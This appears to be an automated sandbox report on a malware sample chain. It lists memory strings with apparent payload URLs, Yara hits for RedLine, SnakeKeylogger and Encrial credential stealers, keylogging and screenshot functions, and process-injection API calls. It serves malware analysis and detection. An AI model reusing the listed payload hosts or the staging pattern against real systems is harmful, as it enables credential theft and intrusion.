Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.2175552195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/H
Source: x.exe, 00000004.00000002.2212967585.000000002090D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/wps/200
Source: x.exe, 00000004.00000002.2212967585.000000002090D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2175552195.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
Source: x.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvwuk
Source: x.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com:443/wps/200_Oupzhkprnvw
Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.1d
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49712 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: Microsofts.exe.8.dr, UltraSpeed.cs	.Net Code: TakeScreenshot
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, UltraSpeed.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: Microsofts.exe.8.dr, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

Source: Yara match	File source: Process Memory Space: x.exe PID: 5792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 31.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 31.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 31.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 26.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 31.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 26.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 26.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 26.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.rpkhzpuO.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 21.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.rpkhzpuO.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

.NET source code contains very large strings

Source: Trading_AIBot.exe.8.dr, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 8.2.rpkhzpuO.pif.255bb674.7.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 8.2.rpkhzpuO.pif.255aa218.8.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File dump: apihost.exe.9.dr 665670656

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3824C NtReadVirtualMemory,	4_2_02B3824C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B384BC NtUnmapViewOfSection,	4_2_02B384BC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02B3DAC4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B3DA3C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02B3DBA8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B38BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B38BA8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B379AC NtAllocateVirtualMemory,	4_2_02B379AC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B37CF8 NtWriteVirtualMemory,	4_2_02B37CF8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B38BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B38BA6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B379AA NtAllocateVirtualMemory,	4_2_02B379AA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B3D9E8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD824C NtReadVirtualMemory,	22_2_02BD824C
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD84BC NtUnmapViewOfSection,	22_2_02BD84BC
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BDDAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	22_2_02BDDAC4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BDDA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	22_2_02BDDA3C
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	22_2_02BD8BA8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BDDBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	22_2_02BDDBA8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD79AC NtAllocateVirtualMemory,	22_2_02BD79AC
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD7CF8 NtWriteVirtualMemory,	22_2_02BD7CF8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	22_2_02BD8BA6
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BD79AA NtAllocateVirtualMemory,	22_2_02BD79AA
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BDD9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	22_2_02BDD9E8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB824C NtReadVirtualMemory,	28_2_02AB824C
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB84BC NtUnmapViewOfSection,	28_2_02AB84BC
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02ABDAC4 NtCreateFile,NtWriteFile,NtClose,	28_2_02ABDAC4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02ABDA3C NtDeleteFile,	28_2_02ABDA3C
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB8BA8 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	28_2_02AB8BA8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02ABDBA8 NtOpenFile,NtReadFile,NtClose,	28_2_02ABDBA8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB79AC NtAllocateVirtualMemory,	28_2_02AB79AC
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB7CF8 NtWriteVirtualMemory,	28_2_02AB7CF8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB8BA6 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	28_2_02AB8BA6
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AB79AA NtAllocateVirtualMemory,	28_2_02AB79AA
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02ABD9E8 NtDeleteFile,	28_2_02ABD9E8

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B385D4 CreateProcessAsUserW,

4_2_02B385D4

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B220C4	4_2_02B220C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B4D596	4_2_02B4D596
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_0040DC11	8_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00407C3F	8_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00418CCC	8_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00406CA0	8_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_004028B0	8_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_0041A4BE	8_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00418244	8_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00401650	8_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00402F20	8_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_004193C4	8_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00418788	8_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00402F89	8_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00402B90	8_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_004073A0	8_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_252B1020	8_2_252B1020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_252B1030	8_2_252B1030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00408C60	8_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_0040DC11	8_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00407C3F	8_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00418CCC	8_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00406CA0	8_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_004028B0	8_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_0041A4BE	8_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00418244	8_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00401650	8_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00402F20	8_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_004193C4	8_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00418788	8_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00402F89	8_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00402B90	8_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_004073A0	8_1_004073A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_0283C168	10_2_0283C168
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_0283CAB0	10_2_0283CAB0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_02837E68	10_2_02837E68
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_02834F08	10_2_02834F08
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_02832DD1	10_2_02832DD1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_0283C386	10_2_0283C386
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_0283CAAE	10_2_0283CAAE
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_0283B9E0	10_2_0283B9E0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_02834EF8	10_2_02834EF8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 10_2_02837E66	10_2_02837E66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00B3B490	11_2_00B3B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00B3B48B	11_2_00B3B48B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_082B3E98	11_2_082B3E98
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00408C60	21_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_0040DC11	21_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00407C3F	21_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00418CCC	21_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00406CA0	21_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_004028B0	21_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_0041A4BE	21_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00418244	21_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00401650	21_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00402F20	21_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_004193C4	21_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00418788	21_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00402F89	21_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00402B90	21_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_004073A0	21_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_336B1020	21_2_336B1020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_336B1030	21_2_336B1030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_36CD47B8	21_2_36CD47B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_36CD47B3	21_2_36CD47B3
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00408C60	21_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_0040DC11	21_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00407C3F	21_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00418CCC	21_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00406CA0	21_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_004028B0	21_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_0041A4BE	21_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00418244	21_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00401650	21_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00402F20	21_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_004193C4	21_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00418788	21_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00402F89	21_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00402B90	21_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_004073A0	21_1_004073A0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 22_2_02BC20C4	22_2_02BC20C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00408C60	26_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_0040DC11	26_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00407C3F	26_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00418CCC	26_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00406CA0	26_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_004028B0	26_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_0041A4BE	26_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00418244	26_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00401650	26_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00402F20	26_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_004193C4	26_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00418788	26_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00402F89	26_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00402B90	26_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_004073A0	26_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_2CE61020	26_2_2CE61020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_2CE61030	26_2_2CE61030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_305747B8	26_2_305747B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_305747A8	26_2_305747A8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00408C60	26_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_0040DC11	26_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00407C3F	26_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00418CCC	26_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00406CA0	26_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_004028B0	26_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_0041A4BE	26_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00418244	26_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00401650	26_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00402F20	26_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_004193C4	26_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00418788	26_1_00418788
